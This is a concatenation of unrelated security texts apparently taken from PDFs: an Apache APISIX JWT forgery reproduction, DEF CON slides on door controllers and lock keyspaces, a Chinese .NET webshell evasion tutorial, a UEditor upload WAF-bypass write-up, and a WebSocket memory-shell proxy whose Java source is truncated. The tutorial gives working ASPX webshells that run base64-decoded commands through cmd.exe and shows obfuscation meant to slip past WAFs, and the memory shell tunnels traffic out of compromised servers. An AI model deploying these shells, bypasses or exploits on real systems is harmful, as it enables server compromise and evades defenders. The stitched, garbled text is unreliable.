rh1RMuDHlJVMYDKTP-EPdoRxugBdCCq9iEL3A004PTQM21rWLcPe1SOqp2Qvcf41iH- 5r5Zs5cuAraQm4qFyhooCziSIPNnbyb8VUMx6k7fGS-WIBMVti- SjG5dEGLwAckCjc_XYMPrHqMRFYU_sB6jY05xX_9u5PFnuOQiu-q3c7gZLHdVSzHeYQGct- nrjcrM2VHvdkMIwMOr25UMhu200HFDhpLXuWpic7WC- rtztTZOtZne7UZ4s6MlnJavZiXWEq3Ovew -i 1 11 创建 Route 对象,并开启 jwt-auth 插件 触发漏洞 Plain Text 复制代码 curl http://127.0.0.1:9080/apisix/admin/consumers -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "username": "jack", "plugins": { "jwt-auth": { "key": "rs-key", "secret": "teamssix-CERTIFICATE" } } }' 1 2 3 4 5 6 7 8 9 10 Plain Text 复制代码 curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "methods": ["GET"], "uri": "/index.html", "plugins": { "jwt-auth": {} }, "upstream": { "type": "roundrobin", "nodes": { "0.0.0.0:80": 1 } } }' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 12 可以看到,这⾥并没有返回刚才设置的 secret 值,⽽是返回了 not enough data,即 err 的信息,这表 明此时 cert 的值已经不为 nil 了,再次证明了上⾯的分析。 观察 APISIX 的漏洞修复信息,可以看到对 jwt-auth.lua ⽂件的第 364 和 395 ⾏进⾏了修改,修复信息 地址: https://github.com/apache/apisix/commit/61a48a2524a86f2fada90e8196e147538842db89 漏洞代码修复 Plain Text 复制代码 curl http://127.0.0.1:9080/index.html? jwt=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJycy1rZXkifQ.mF27BBWlX Pb3fTiFufhcL3K9y99b8kioMmp7eMwRhB1kZjK62aJ_R6SB0A_Kmym8a7U2S3zYLue9mkD4FG GmhwmkmUGppjZdtwfxrZc7JvvdpJbihNGxdfn9ywUspr6DX831e29VAy1DnLT6cU8do_9MFkl xrRbhTVpDOsOADEhh6Q5zdTKPz3h5pKHSQYO4y5Xd0bmRM7TqRvhfIRchmvroaJBQjP6TrDrN _x2elRpPsuabYmCNH_G7m6x5ouf0bqoOkOmsk3alJ6zNZFDY6-aTS4vDD8SDlSbAXkCh5DN- C10YQ6ZYWUGmcbap7hQhaIVJRlZRtaXMFbmabLwhgg -i 1 13 这⾥是将原来的直接返回报错原因改成了返回 JWT token invalid 和 JWT token verify failed 的⽂本信 息。 升级⾄ Apache APISIX 2.13.1 及以上版本 安装补丁包,补丁包地址详⻅:https://apisix.apache.org/zh/blog/2022/04/20/cve-2022- 29266 这个漏洞最终造成的⻛险是 JWT 伪造,但前提是需要对⽅的 APISIX 开启了 jwt-auth 插件才⾏,并且 如果有细⼼的读者可能会发现,当我们构造 RS256 算法的 JWT 时,需要先知道⽬标 APISIX consumer 对象的 key 值,因此这个漏洞利⽤起来还是有⼀定限制的。 这篇⽂章也已经同步到了 T Wiki 云安全知识⽂库中,⽂库地址:wiki.teamssix.com,⽂库中都是云安 全相关的⽂章,并且有很多来⾃⼤家共同贡献的云安全资源,也⾮常欢迎你⼀起来补充 T Wiki 云安全知 识⽂库。 修复⽅案 ● ● 总结 14 参考链接: https://t.zsxq.com/mqnAeeY https://www.jianshu.com/p/1b2c56687d0d https://teamssix.com/211214-175948.html https://apisix.apache.org/blog/2022/04/20/cve-2022-29266 https://zone.huoxian.cn/d/1130-apache-apisix-jwt-cve-2022-29266 由于笔者个⼈的技术⽔平有限,因此如果⽂章中有什么不正确的地⽅,欢迎在留⾔处指正,不胜感 激。
pdf
“We don’t need no stinkin’ badges!” Shawn Merdinger security researcher DEFCON 18 Hacking electronic door access controllers Outline • EDAC technology – Trends, landscape – Vendors – Architecture • EDAC real-world analysis – S2 Security NetBox • Research, exposure, vulnerabilities, attacks • Countermeasures & recommendations Learning outcomes • Awareness of security issues in EDAC systems • Major players, vendors, resellers • Pen-testing knowledge • Research and testing methods Q . About security of buildings around town….what was your response? ATTY GEN. RENO: “Let's do something about it.” Q. Is this a good thing that has happened? ATTY GEN. RENO: I think any time you expose vulnerabilities, it's a good thing. Department of Justice Weekly Media Briefing, 25 May 2000 “When hackers put viruses on your home computer it's a nuisance; when they unlock doors at your facility it's a nightmare.” John L. Moss, S2 Security CEO STAD, Volume14, Issue 1. 1 January, 2004 Choice quotations EDAC Technology Overview • Trend is towards IP from proprietary solution – Convergence of IP, Video – Adding other building systems (HVAC, elevators, alarms) – Cost savings, integration, increased capabilities • Most controllers use embedded Linux • Wide range of vendors in EDAC space S2 Security Honeywell HID Global Vertx Ingersoll-Rand Bosch Security Reach Systems Cisco Systems (Richards Zeta) Brivo DSX Access RS2 Technologies Synergistics EDAC Deployment • Often you’ll see – Managed by building facilities people – Stuck in a closet and forgotten – Long lifecycles of 5-10 years • Distanced from IT Security – Physical security is not your domain. It’s ours. – Patching, upgrades, maintenance. What? Huh? – Policies regarding passwords, logging don’t apply – 3rd party local service contractor adds doors, hardware configuration EDAC Architecture S2 Security NetBox • Built by S2 Security • 9000+ systems installed worldwide – Schools, hospitals, businesses, LEA facilities, etc. • Same box is sold under multiple brand names – Built by S2 Security • NetBox – Distributed by Linear • eMerge 50 & 5000 – Resellers’ re-branding • Sonitrol eAccess S2 Security NetBox S2 Security: Reading up • Preparation and information gathering – S2 Security case studies, press releases – “The Google” – Lexis-Nexis Academic Universe, ABI-Inform, etc. • Example: able to determine from http://tinyurl.com/s2mysql – Samba client – MySQL, MyISAM – Lineo Linux distribution (just like Zarus! ) – Processor is ARM Core IXP 425 chip @ 533 MHz – Only 15 months from design to 1st customer shipping – “S2 did not have much prior experience with open source” – “MySQL is used to store everything from reports, user information, customized features, facility diagrams, and more” NetBox Components • HTTP • MySQL / Postgres • NmComm • FTP/Telnet • Features! NetBox Component: HTTP Server • GoAhead Webserver TCP/80 • Poor choice – Sixteen CVEs • CVE-2003-1568, CVE-2002-2431, CVE-2002-2430, CVE- 2002-2429, CVE-2002-2428, etc. • No vendor response – Typical example in CVE-2002-1951 • Vendor response: GoAhead….contacted on three different occasions during the last three months but supplied no meaningful response. "Data security is a challenge, and unfortunately, not everyone has risen to it.“ John L. Moss, S2 Security CEO NetBox Component: MySQL • MySQL server listening on 3306 • Outdated SQL – Version 2.X uses MySQL version 4.0 • 3.X uses Postgres – Just how old is MySQL 4.0? • WTF? End of DOWNLOAD? NetBox Component: NmComm • Service listening on TCP/7362 • Performs multicast discovery of nodes • Daemon coded by S2 Security • Patent issued 15 December, 2009 – “System and method to configure a network node” • http://tinyurl.com/s2patent “Gentlemen, start your fuzzers!” NetBox Component: FTP & telnet • Cleartext protocols for a security device – Telnet to manage – FTP for DB backups • Poor security-oriented documentation "We see some vendors fitting their serial devices with Telnet adapters, which simply sit on the network transmitting unsecured serial data.” John L. Moss, S2 Security CEO NetBox Components: Features! • Lots of extras and licenses options – Elevators, HVAC, Burglar – VoIP • Increases complexity • Expands attack surface – Daemons – Libraries NetBox Components: Features! • View floorplans NetBox unauthenticated reset • VU#571629 • Remote, unauthenticated factory reset via crafted URL NetBox Unauth Access to Backup • VU#228737 – Unauth attacker can dload DB backups – Nightly DB backup is hardcoded CRONJOB • File name is “full_YYYYMMDD_HHMMSS.1.dar” • Predictable naming convention with timestamp • Uncompress the.dar format – Backup DB is in “var/db/s2/tmp/backup/all.dmp” – Attacker gets backup DB = Game Over • Entire system data in DB! NetBox Unauth Access to Backup • Extraction of administrator MySQL_64bit hash • Affects NetBox 2.X (mysql) and 3.X (postgres) • Hash is trivial to crack • Attacker now has admin access NetBox Pwnage: Doors • Open any door – Right now – Or schedule NetBox Pwnage: Cameras • Backup file contains IP camera information – Name, IP address, admin username and password • NetBox 2.X and 3.X systems vulnerable • Attacker now owns IP cameras "Most hackers don't care about watching your lobby. If they gain access to the network, they're going to go after financial data and trade secrets.” Justin Lott, Bosch security marketing NetBox Pwnage: DVRs • User/Pass to DVRs in backup DB • Poor setup guides for DVRs • Recommends keeping default user/pass – On-Net Surveillance Systems Network Video Recorder document NetBox Fingerprinting • Remote Identification – MAC OID registered to S2 Security – Nmap service fingerprint submitted (nmap 5.20) Recommendations: Vendor • Vendor – Conduct security evaluations on your products – Provide secure deployment guides – Tighten-up 3rd party integration – Improve • Logging – More details: changes, auditing, debug levels – Ability to send to log server • HTTP – Use a “better” HTTP daemon – Enable HTTPS by default – Modify banners, reduce footprint, etc. • FTP – Change to SFTP • Telnet – Change to SSH Recommendations: Customers – Demand better security! • From vendor, reseller, and service contractor • Expect fixes and patches – Manage your EDAC like any other IT system • Patching, change management, security reviews – Technical • Isolate eMerge system components – VLANs, MAC auth, VPN, restrict IP, etc. Questions? • Contact – Follow-up questions – Security evaluations scm@hush.com http://www.linkedin.com/in/shawnmerdinger
pdf
.NET WebShell 免杀系列Ⅱ之 Tricks 分享 Ivan1ee@dotNet 安全矩阵 [ dotNet 安全矩阵] —— 聚焦于微软.NET 安全技术,关注基于.NET 衍生出的各种红蓝攻防对抗技术、分享内容不限于 .NET 代码审计、 最新的.NET 漏洞分析、反序列化漏洞研究、有趣的.NET 安全 Trick、.NET 开源软件分享、. NET 生态等热点话题,愿你能在这里学 到实在的干货,共同推动.NET 安全氛围卷起来。 配套的[ dotNet 安全矩阵]知识星球优惠活动持续进行,每天只需要 1 块钱不到,就可以让自己从.NET 小白成为高手,因为星球里的资料 和教程很少在市面上广泛传播,价值完全划算,还可以获得阿里、蚂 蚁、字节等大厂内推实习或社招岗位的机会,欢迎对.NET 感兴趣的 小伙伴们加入我们,一起做一件有情有意义的事。 0x01 背景 .NET WebShell 绕过和免杀的方法系列第二季开始啦,接上季走硬刚 Unicode 编码绕过的方式 Bypass 主流的 webshell 查杀工具之后,本文介绍几种特殊的 免杀和绕过技巧,有助于在实战中对抗 WAF 等安全产品,希望能帮助到大 伙。 0x02 技巧一符号 2.1 逐字标识符 @符号在.NET 字符中有着特殊的意义,把“@”放在一个字符串前面,表示后面是一个逐字 字符串,@符号的这个特点使得在表示系统文件路径时很方便,就可以不再需要转义符。 使用@字符后无法在字符串中插入有效的换行符(\n)或制表符(\t),因为将被当成正常字符 串输出。例如以下 Demo 另外还可以转义.NET 平台保留的关键词,如 Class、NameSpace、int 等,参考如下 Demo string filepath = "C:\\Program Files\\wmplayer.exe"; => C:\Program Files\wmplayer.exe string filepath = @"C:\Program Files\wmplayer.exe"; => C:\Program Files\wmplayer.exe string filename = @"dotNet\tFile"; => dotNet\tFile 既然@字符可以做这么多有趣的事,咱们就研究下利用它绕过某些安全产品的防护规则, 笔者在 Process 类完整的命名空间处每个点之间都加上@符,如下 2.2 内联注释符 在.NET 项目中单个 aspx 页面里支持使用内联注释符 /**/ , 此符号只会注释掉两个*号之间 的内容,利用此特点也可以在类完全限定名每个点之间加上内联注释,如下 namespace @namespace { class @class { public static void @static(int @int) { if (@int > 0) { System.Console.WriteLine("Positive Integer"); } else if (@int == 0) { System.Console.WriteLine("Zero"); } else { System.Console.WriteLine("Negative Integer"); } } } } <script runat="server" language="c#"> public void Page_load(){ @System.@Diagnostics.@Process.@Start("cmd.exe","/c mstsc"); } </script> <%@ Page Language="C#" ResponseEncoding="utf-8" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%> <script runat="server"> public void Page_load() {System/**/.Diagnostics./**/Process/**/.Start("cmd.exe","/c calc");} </script> 0x03 语言 3.1 托管语言 c# .NET WebForm 项目通常包含多个 ASPX 文件,每个文件都是 C#语言编写服务端代码,其 @Page 指令最常用的设置如以下代码所示,[ Language ] 属性指明服务端所使用的托管 语言类型,默认均为 Language="C#" [ AutoEventWireup ] 属性可设置 Index.aspx 页面的事件是否自动绑定,其值为布尔类 型,[ CodeBehind ] 属性指定包含与页关联的类的已编译文件的名称,这个属性不能在运 行时使用。[ Inherits ] 定义本页面所继承的代码隐藏类,该类的以分部类方式定义于 [ CodeBehind ] 属性所指向的 .cs 文件中,该类派生于 System.Web.UI.Page 类。 3.2 托管语言 csharp 在 WebForm 项目单个 ASPX 文件中@Page 指令也不是必须要声明的,可以省略。<script runat="server"> 标签表示代码运行于服务端,language 可指定为 csharp <%@ Page Title="About" Language="C#" AutoEventWireup="true" CodeBehind="About.aspx.cs" Inherits="WebApplication1.About" %> <script runat="server" language="csharp"> public void Page_load() { if (!string.IsNullOrEmpty(Request["content"])) { var content = Encoding.GetEncoding("utf- 8").GetString(Convert.FromBase64String(Request["content"])); System.Diagnostics.Pro\U0000FFFAcess.Star\uFFFAt("cmd.exe","/c " + content); } } </script> 3.3 托管语言 cs 现在市面上大多数的安全防护产品和规则都紧盯着 language=csharp 或 language=c# 这两种,很多大马和小马在上传漏洞的场景下被封杀的死死的,但却忽略了.NET 编译器还 提供了 language=cs 这样的简略写法,有天帮助一位师傅成功绕过 WAF 拦截,哈哈挺有 效的。 参考的 demo 代码如下原因在于 .Net 编译器提供 Microsoft.CSharp.CSharpCodeProvider 类实现对 C#代码编译的 笔者分析程序集完全限定名为 Microsoft.CSharp.CSharpCodeProvider, System, Version=1.0.5000.0, Culture=neutral, PublicKeyToken=b77a5c561934e089,因为 System.CodeDom.Compiler.CodeDomProvider 类里的私有方法 GetCompilerInfoForLanguageNoThrow 获取 config 配置文件里的语言类型编译选项 从 PrivilegedConfigurationManager.GetSection 方法可以清楚的看到从配置文件的 system.codedom 标签下获取定义的所有语言类型,微软官方文档预设定义了三种,如下 所示,详情点击 微软官方文档 属性 描述 compilerOptions 指定用于编译的其他特定于编译器的参数。 extension 为语言提供程序提供由源文件使用的文件扩展名的分号分隔列表。 例如“.cs” language 提供由语言提供程序支持的语言名称的分号分隔列表。 例如“C#;cs;csharp”。 type 包括包含提供程序实现的程序集的名称。 类型名称必须符合指定完全限定的类型 warningLevel 指定默认的编译器警告级别;确定语言提供程序将编译警告视为错误的级别。 所以在默认的.NET 编译器里支持 language=cs 这样的声明,基于这点创造的 webshell 代 码如下 <%@ Page Language="cs" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%> 0x04 别名 using + 命名空间名,这样可以在程序中直接用命令空间中的类型,而不必指定类型的详细 命名空间,类似于 Java 的 import,这个功能也是最常用的,如下 另外 using 语句还可以定义.NET 资源使用范围,在程序结束时处理对象释放资源,比较常 见与文件读写或者数据库连接等场景,如下代码 using 还有个取别名的功能,using + 别名 = 包括详细命名空间信息的具体的类型,当需 要用到这个类型的时候,就每个地方都要用详细命名空间的办法来区分这些相同名字的类 型,当然被笔者用来做免杀也是相当的赞,但在 ASPX 单个页面使用时,using 变成 Import 关键词,如下代码 <script runat="server" language="cs"> public void Page_load(){ System.Diagnostics.Process.Start("cmd.exe","/c calc"); } </script> using System; using System.Data; using (SqlDataAdapter sqa = new SqlDataAdapter(sql, sc)) { sqa.SelectCommand.CommandTimeout = executeTimeOut; sqa.Fill(dtRet); return dtRet; } <%@ Import Namespace="dotNet=@System.@Diagnostics.@Process" %> <script runat="server" language="c#"> public void Page_load(){ dotNet.Start("cmd.exe","/c calc"); } </script> 将 Process 类的完全命名空间赋给 dotNet 这个别名,然后再代码中直接使用 dotNet.Start 方法启动新进程,这种方式或许能绕过一些安全产品的规则。 0x05 结语 .NET 这些有趣的 Tricks 还有很多,如果对这些技巧感兴趣的话可以多关注我们的博客、公 众号 dotNet 安全矩阵以及星球,下一篇将继续分享 .NET 免杀 Trick,请大伙继续关注文 章。另外文章涉及的 PDF 和 Demo 已打包发布在星球,欢迎对.NET 安全关注和关心的同 学加入我们,在这里能遇到有情有义的小伙伴,大家聚在一起做一件有意义的事。 0x06 星球 为了庆祝公众号粉丝突破 5K,星球提供优惠劵立减【¥30】 ,加入星球每天只需要 1 块钱 不到,就可以让自己从.NET 小白成为高手,因为星球里的资料和教程很少在市面上广泛传 播,价值完全划算,对.NET 关注的大伙请尽快加入我们吧! dotNet 安全矩阵知识星球 — 聚焦于微软.NET 安全技术,关注基于.NET 衍生出的各种红 蓝攻防对抗技术、分享内容不限于 .NET 代码审计、 最新的.NET 漏洞分析、反序列化漏 洞研究、有趣的.NET 安全 Trick、.NET 开源软件分享、. NET 生态等热点话题、还可以获得 阿里、蚂蚁、字节等大厂内推的机会。
pdf
所有操作均在授权项目中进行。 一天下午好兄弟发来一个 ueditor 环境存在.net 任意文件上传一起看下,存在创某盾 waf。 0x01 把所有常用办法都测试例如 uri 填充、post 填充、大并发、参数混淆、参数 fuzz 等等都测试 过后均失败。 后 fuzz 其他扩展名发现 cer、asmx、shtml 可以上传其他 ashx 什么的拦截。 其中 cer 创某盾禁止访问。asmx 文件试了很多个文件访问均 500 报错,谷歌后似乎是因为 要.net4.6 以上才默认支持 asmx,不知道与 iis10 版本有没有关系。 尝试 shtml exec 执行命令提示。 包含文件报错,谷歌说原因是读取的路径或者文件中含有中文,此处暂时放下。 打印环境变量成功由此知道了目标中间件是 iis10 和其它信息。 到这里思路又卡住了,花了很多时间回去继续 fuzz 参数等等。 0x02 没招了,找分析文章看这个漏洞的原理。发现大部分文章都是抄 Ivan1ee 的文章,并没讲的 很清楚,只是复现下在讲下大概原理就没了。于是下载了.net 版源码,跟流程。 /net/controller.ashx 这里实例化 CrawlerHandler 类,跟进这个类。 /net/App_Code/CrawlerHandler.cs 第一红色箭头判断了传入 url 访问后 response 头有无图片头,这里如果我们把我们的站点所 有请求均加入图片头,直接传入 aspx 一样可以下载原 poc:1.jpg?.aspx 只是用图片马方便绕 过图片头判断。 第二红色箭头是漏洞代码所在,由其处理最关键的 path,其他抄文章的到这里就是一句话 说这个函数存在漏洞就没了。为了搞清楚究竟路径是如何处理的跟进该函数。 /net/App_Code/PathFormater.cs 这里两个红色箭头处才是漏洞根源,invalidPattern.Replace 通过正则去除了路径中的部分特 殊字符,将匹配的字符置空。这里可以看到正则内共有[\\\/\:\*\?\042\<\>\|]这么多字符,都 可以置空。 第二个箭头到了 extention 处就是指定文件扩展名的,GetExtension()这个函数是自带函数用 于获取最后的扩展名。 以原 poc 为例子:漏洞原理为 1.jpg?.aspx 到了 invalidPattern.Replace 处通过正则替换后成 为 1.jpg.aspx 后经过 GetExtension()得到扩展名 aspx 最后 return 处理后的路径及扩展名。 经上面得知正则支持很多替换,马上去试了结果还是拦截掉了。 根据这个正则又 fuzz 了下还是拦截。这时候快十二点了,暂时又没了思路。再看看代码什 么的,又花了半个多小时。之后突然想到既然 PathFormater 可以帮忙把特殊符号置空,自 己直接通过特殊符号拼接 aspx 关键字不就能绕过了,再去操作下。 构造 poc,已经成功。用这个思路还有类似的 poc 可以绕过这里不再贴图。 0x03 绕过 测试时猜测 waf 后端的规则的粒度应该控制到具体漏洞级别了,针对不同漏洞有不同的规 则。如把 uri 中的 action 删除就不会拦截,这时候应该规则就匹配不到 ue 这个漏洞规则所 以不会拦截。 优点:细粒度的规则最大程度避免了对生产业务的干扰。 缺点:针对不同漏洞需要花很多精力根据漏洞代码做细致规则,否则可能就像 ue 通过源码 中的代码逻辑构造不常见的利用方式就可完成绕过。 总结:从代码里面构造新的 poc 是一种快捷的思路。 0x04 防御 针对正则表达式处增加对应的规则修补。 Ref: https://forums.iis.net/t/1241946.aspx?Setting+up+IIS+10+for+ASMX+service https://www.freebuf.com/vuls/181814.html
pdf
Exploiting Keyspace Vulnerabilities in Locks Bill Graydon @access_ctrl b.graydon@ggrsecurity.com github.com/bgraydon Take a look at your keyring... 2 Outline ● How locks & keys work ● Intro to the tools I’m releasing ● Brute forcing all possible keys ● Reading the pins in a lock ● Impressioning with extra information ● Keyed alike systems & lock disassembly in nonmastered systems ● Information theory and entropy ● How master keying works ● Deriving a master key from multiple low-level keys ● Rights amplification in mastered systems ● Special cases: construction keying, IC cores, Medeco, Mul-T-Lock ● Remediation 3 Software Analysis Tools Try it yourself! https://ggrsecurity.com/personal/~bgraydon/keyspace Or: https://tinyurl.com/key-space Source: https://github.com/bgraydon/lockview https://github.com/bgraydon/keyspace 4 How Locks Work What is a key? Mechanically encoded information. 7 Background | Key Codes 8 Background | Key Codes | Bitting 87527 # INCH MM 0 0.335 8.51 1 0.320 8.13 2 0.305 7.75 3 0.290 7.37 4 0.275 6.99 5 0.260 6.60 6 0.245 6.22 7 0.230 5.84 8 0.215 5.46 9 0.200 5.08 10 Background | Key Codes 52864 87527 11 MACS - Maximum Adjacent Cut Specification 12 MACS - Maximum Adjacent Cut Specification 14 MACS = Maximum Adjacent Cut Specification Key Type MACS Schlage 7 Kwikset 4 Sargent 7 Yale 7 Weiser 7 Medeco 2,3,4 Keyspaces In theory - Number of depths to the power of the number of spaces E.g. - Schlage - 10 depths, to the power of 5 or 6 spaces - 100,000 or 1,000,000 possible combinations Medeco - 6 depths, to the power of 5 or 6 spaces - 7000 or 46000 combinations There are further limitations imposed by physical constraints! 16 Keys vs. Passwords Trait Password Key Cost to try one $0.00000000001 $0.30-$10.00 Detectability of brute force Possible Challenging Length Unlimited Severely Limited Complexity Unlimited Limited Ease of changing Easy Costly and time-consuming Privilege levels Unlimited schemes Limited to hierarchical* 17 The Economics of Brute-Force Attacks Brute force = trying all possible keys If we have n key codes to try, we need at most n blanks, possibly fewer ● Blanks cost between $0.13 and $3.00 - the common ones are cheap ● If you have access to a code cutting machine, the marginal cost of a new key cut is the blank + your time ● If you do not, locksmiths will cut keys to code for $3.00-$10.00 each E.g. - if you can reduce the keyspace of a given lock to 1000 possible keys, the cost might be $450 (you own a code machine, blanks are $0.45 each) or $4000 (you need to use a locksmith, cost per cut key is $4.00) 18 20 21 22 Lock Tolerances 23 32 Decoding Locks 35 Password Re-Use ● Is bad Key Re-Use ● Is called “keyed alike” and is a common and accepted arrangement In a keyed-alike system, the key space is 1! 43 Keyed Alike - When Your Keyspace is 1 ● Elevators ● Most alarms (i.e. Detex) ● Enterphone systems ● Most controller boxes ● Golf carts ● Heavy equipment ● Police cars ● Traffic light controllers ● Telecom boxes ● Almost all other utilities ● New York City ● HVAC / Building automation systems ● Many city’s fire safety boxes ● Many regional Knox boxes ● Vending machines ● Postal keys ● Luggage - TSA keys ● Handcuffs HOPE XI: Howard Payne & Deviant Ollam, This Key is Your Key, This Key is My Key 44 45 46 47 48 49 Lock Disassembly 50 DEF CON 26 - m010ch - Please Do Not Duplicate Attacking the Knox Box Information Theory Shannon Entropy Information = stuff we know. Entropy = stuff we don’t know. We know whether a stop light is red or green. The colour of a stop light is information. We don’t know the outcome of a random variable, such as a coin flip or a dice roll. A coin flip and or dice roll has entropy. A key or password has entropy. 55 Measuring Entropy Once we do know the information, how many bits on a hard drive will it take to write it down (on average)? A coin flip → one bit A random number 0..255 → 8 bits A random number 1..10 → 3.32 bits 3 random numbers 1..10 can be encoded in a number 0..103. We can use 10 bits to encode 0..1023. So 10 bits will encode 0..999. 10 bits / 3 random numbers 1..10 ≈ 3.33 ≈ 3.32 bits / random number 56 Measuring Entropy Number of bits it takes to write down a number 0..x → log2(x) Number of bits of entropy (H) for a random variable with n outcomes: → H = log2(n) E.g: A fair coin flip, 2 outcomes: log2(2) = 2 bits A random number 0..255: log2(256) = 8 bits A random number 1..10: log2(10) = 3.322 bits 57 Key Entropy Examples Number of bits in a piece of information (e.g. key, password) - ● 8-character ASCII password - 8*8=256 bits of entropy ● 10-digit passcode, 3 characters long - 1000 combinations or 9.97 bits ● EVVA MCS key, 4 rotors with 8 positions each - 8^4=4096 or 12.00 bits of entropy ● Schlage 5-pin system - 5^10 or 100000 combinations (16.6 bits) If there are N possibilities, and all possibilities are equiprobable, then entropy (H) is given by: H = log2(n) If some possibilities are more likely than others, entropy goes down. E.g., dictionary-based passwords; avoidance of deep cut keys; key coding to deter picking 58 Entropy: 2 Possibilities, Unequal Probability Master key decoded to 14767 or 94767… When 50/50 chance… H = -p1 log2(p1) - p2 log2(p2) H = -0.5 log2(0.5) - 0.5 log2(0.5) = -log2(0.5) = log2(2) = 1 bit. Are these equiprobable? H = 0.95 log2(0.95) + 0.05 log2(0.05) = 0.286 bits In the extreme, if one option is certain, that’s 0 bits! In general… H = -Σ p log2(p) 59 Joint+Conditional Entropy, Mutual Information Master Keying 63 65 Master Keyed Lock Disassembly 68 Deducing the Master from Multiple Change Keys Rights Amplification Construction Core Systems Interchangeable Core Systems 74 75 159 Possible Medeco TMKs If… Intelligence: large facility Intelligence: IC System Reduce further with change keys and other information. 78 79 80 Correct Key: Incorrect Key: 85 86 87 Medeco Biaxial 88 MKA → B45 ↓ 89 GMK → B45 ↓ 90 Nonmastered Medeco Locks 92 Physical Creation of Keys 94 95 Getting a Key Cut 1. Identify the blank 2. Determine the bitting code you want 3. Go to a locksmith (not a hardware store or 7/11) 4. Ask if they can cut you a key by code 5. Give them the blank and code: e.g. “A Schlage SC1 with bitting code 0-4-2-8-5” 6. If they say “that key is restricted, I can’t cut you that”... check out our DEF CON 27 talk on Duplicating Restricted Mechanical Keys or wait a year for our (tentative) DEF CON 29 part II of that talk. 96 Defenses ● Avoid very large mastering systems ● Don’t master high-security and low-security facilities on one system ○ Very high risk locations should be off-master (current requirement for USA nuclear arsenals) ● A missing lock is as bad as a missing GMK! ● Consider alternatives to the 2-step system ○ Other specific defenses ○ If this is in your threat model ● Use a restricted keying system - it won’t stop a determined attacker, but it can slow them down and drive their costs up ● Your facility should be secure even if an attacker has the GMK ○ All a lock does is keep honest people honest. Add alarms, guards, etc. ● Use IC or electronic components to make rekeying easier 97 Questions? b.graydon@ggrsecurity.com @access_ctrl Go try it! https://ggrsecurity.com/personal/ ~bgraydon/keyspace Or: https://tinyurl.com/key-space Source: https://github.com/bgraydon/lockview https://github.com/bgraydon/keyspace A huge thank you to Josh Robichaud, Karen Ng and Jenny & Bobby Graydon for their help in preparing this talk.
pdf
1 Websocket内存⻢利⽤的些补充 jspjs利⽤ WsProxy内存⻢ 前⼀段时间有师傅提出了基于websocket的内存⻢,并给出了实现: https://github.com/veo/wsMemShell 本来想写⼀写,但是看到https://tttang.com/archive/1673/ 这篇师傅的⽂章已经写的很好了,这⾥就 提⼀些利⽤⽅⾯的东⻄。 最新版本的蚁剑已经⽀持连接websocket协议的内存⻢,在官⽅更新doc⾥提到pswindows跟 cmdlinux可以使⽤,其实jspjs类型也是可以直接连接的。上篇⽂章https://yzddmr6.com/posts/java- expression-exploit/⾥⾯提到过为了兼容各种表达式注⼊,把jspjs类型的其他参数都合并为⼀个了,所 以直接把主payload部分发过去就完事了。 jspjs利⽤ 2 由于ws是全双⼯的,所以⽤来做代理⾮常的⽅便。原版的github项⽬中给出了cmd内存⻢的代码,但是 没有给wsproxy部分的内存⻢代码。因为defineClass⼀次只能打进去⼀个Class,改写内存⻢其实主要涉 及到类的复⽤。这⾥补充上⾃⼰修改的⼀个版本,使⽤的时候编译成class替换 https://github.com/veo/wsMemShell/blob/main/WsCmd.java⾥⾯的bytes: WsProxy内存⻢ 3 Plain Text 复制代码 import javax.websocket.*; import java.io.ByteArrayOutputStream; import java.net.InetSocketAddress; import java.nio.ByteBuffer; import java.nio.channels.AsynchronousSocketChannel; import java.nio.channels.CompletionHandler; import java.util.HashMap; import java.util.concurrent.Future; import java.util.concurrent.TimeUnit; public class WsProxy extends Endpoint implements CompletionHandler<Integer, WsProxy>, MessageHandler.Whole<ByteBuffer> {   Session session;   ByteBuffer buffer;   public AsynchronousSocketChannel client;   public Session channel;   long i = 0;   ByteArrayOutputStream baos = new ByteArrayOutputStream();   HashMap<String, AsynchronousSocketChannel> map = new HashMap<String, AsynchronousSocketChannel>();   void readFromServer(Session channel, AsynchronousSocketChannel client) {       buffer = ByteBuffer.allocate(50000);       WsProxy attach = new WsProxy();       attach.client = client;       attach.channel = channel;       client.read(buffer, attach, this);   }   void process(ByteBuffer z, Session channel) {       try {           if (i > 1) {               AsynchronousSocketChannel client = map.get(channel.getId());               client.write(z).get();               z.flip();               z.clear();           } else if (i == 1) {               String values = new String(z.array());               String[] array = values.split(" ");               String[] addrarray = array[1].split(":"); 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 4               AsynchronousSocketChannel client = AsynchronousSocketChannel.open();               int po = Integer.parseInt(addrarray[1]);               InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po);               Future<Void> future = client.connect(hostAddress);               try {                   future.get(10, TimeUnit.SECONDS);               } catch (Exception ignored) {                   channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");                   return;               }               map.put(channel.getId(), client);               readFromServer(channel, client);               channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");           }       } catch (Exception ignored) {       }   }   @Override   public void onOpen(final Session session, EndpointConfig config) {       this.session = session;       i = 0;       session.addMessageHandler(this);   }   @Override   public void completed(Integer result, final WsProxy scAttachment) {       buffer.clear();       try {           if (buffer.hasRemaining() && result >= 0) {               byte[] arr = new byte[result];               ByteBuffer b = buffer.get(arr, 0, result);               baos.write(arr, 0, result);               ByteBuffer q = ByteBuffer.wrap(baos.toByteArray());               if (scAttachment.channel.isOpen()) {                   scAttachment.channel.getBasicRemote().sendBinary(q);               }               baos = new ByteArrayOutputStream();               readFromServer(scAttachment.channel, scAttachment.client);           } else {               if (result > 0) {                   byte[] arr = new byte[result]; 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 5 注意路径⼀定要⽤?path=xxx表示,不能直接填endpoint的地址,如ws://192.168.88.130:8083/shell/p 具体可以看gost的⽂档,当时⼀直被这⾥卡住连不上: https://gost.run/reference/dialers/ws/#websocket_1 